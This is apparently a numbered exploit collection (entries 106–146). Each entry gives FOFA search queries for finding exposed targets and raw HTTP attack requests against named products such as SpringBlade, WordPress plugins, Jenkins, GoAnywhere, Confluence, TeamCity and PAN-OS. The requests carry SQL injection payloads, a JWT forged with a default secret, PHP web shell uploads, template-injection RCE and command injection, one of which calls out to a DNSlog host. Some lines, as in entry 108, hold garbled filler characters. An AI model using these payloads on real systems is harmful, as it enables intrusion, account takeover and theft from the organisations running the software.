106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Blade-Auth is a JWT. The one above is the widely circulated admin token signed with the framework's shipped default JWT secret, so it is only accepted by deployments that never changed that default; otherwise a valid token for the target is required.


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close


108. D-Tale 3.9.0 SSRF" _. E" I0 l2 s1 K  @6 g
CVE-2024-21642
/ S- ?! x" P5 n& y5 J$ h! lFOFA:"dtale/static/images/favicon.png"
/ L3 l! A7 j2 A9 p6 I7 NGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1; _1 I% Y0 @5 C* V. H4 I" b/ b
Host: your-ip, ~# g; o  a2 f$ |  h2 U; z
Accept: application/json, text/plain, */*( K2 @3 l8 s0 ^* w$ Q7 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
' Y- d3 r% u4 a7 `* z; g. e& f! ~3 HAccept-Encoding: gzip, deflate0 x  x1 x4 r- |
Accept-Language: zh-CN,zh;q=0.9,en;q=0.82 B7 N! m! z! X
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
Upload side (carries the command and its arguments):
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 53

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

Download side (same Session value; receives the output):
POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

The response on the download side leaks lines of the file inside the argument-parsing error message:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml" || icon_hash="1484947000" || icon_hash="1828756398" || icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA:body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--


117. WordPress LayerSlider plugin SQL injection
Affected versions: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


118. Beijing Baichuo (北京百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


The txt_path field controls where the file is written; afterwards access /home/src.php.

119. Beijing Baichuo (北京百绰) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://x.x.x.x:8443
Referer: https://x.x.x.x:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. Beijing Baichuo (北京百绰) Smart S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--


The uploaded file is written to /upload/2.php.

121. 北京百绰 Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

boot/web/upload/weblogo/1.php

122. 北京百绰 Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The parameter sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. 湖南建研 engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user is created, log in to the admin backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall (云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. 福建科立迅 communications command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. 福建科立讯 communications command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. 福建科立讯 communications command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. 福建科立讯 communications command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. 福建科立讯 communications command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
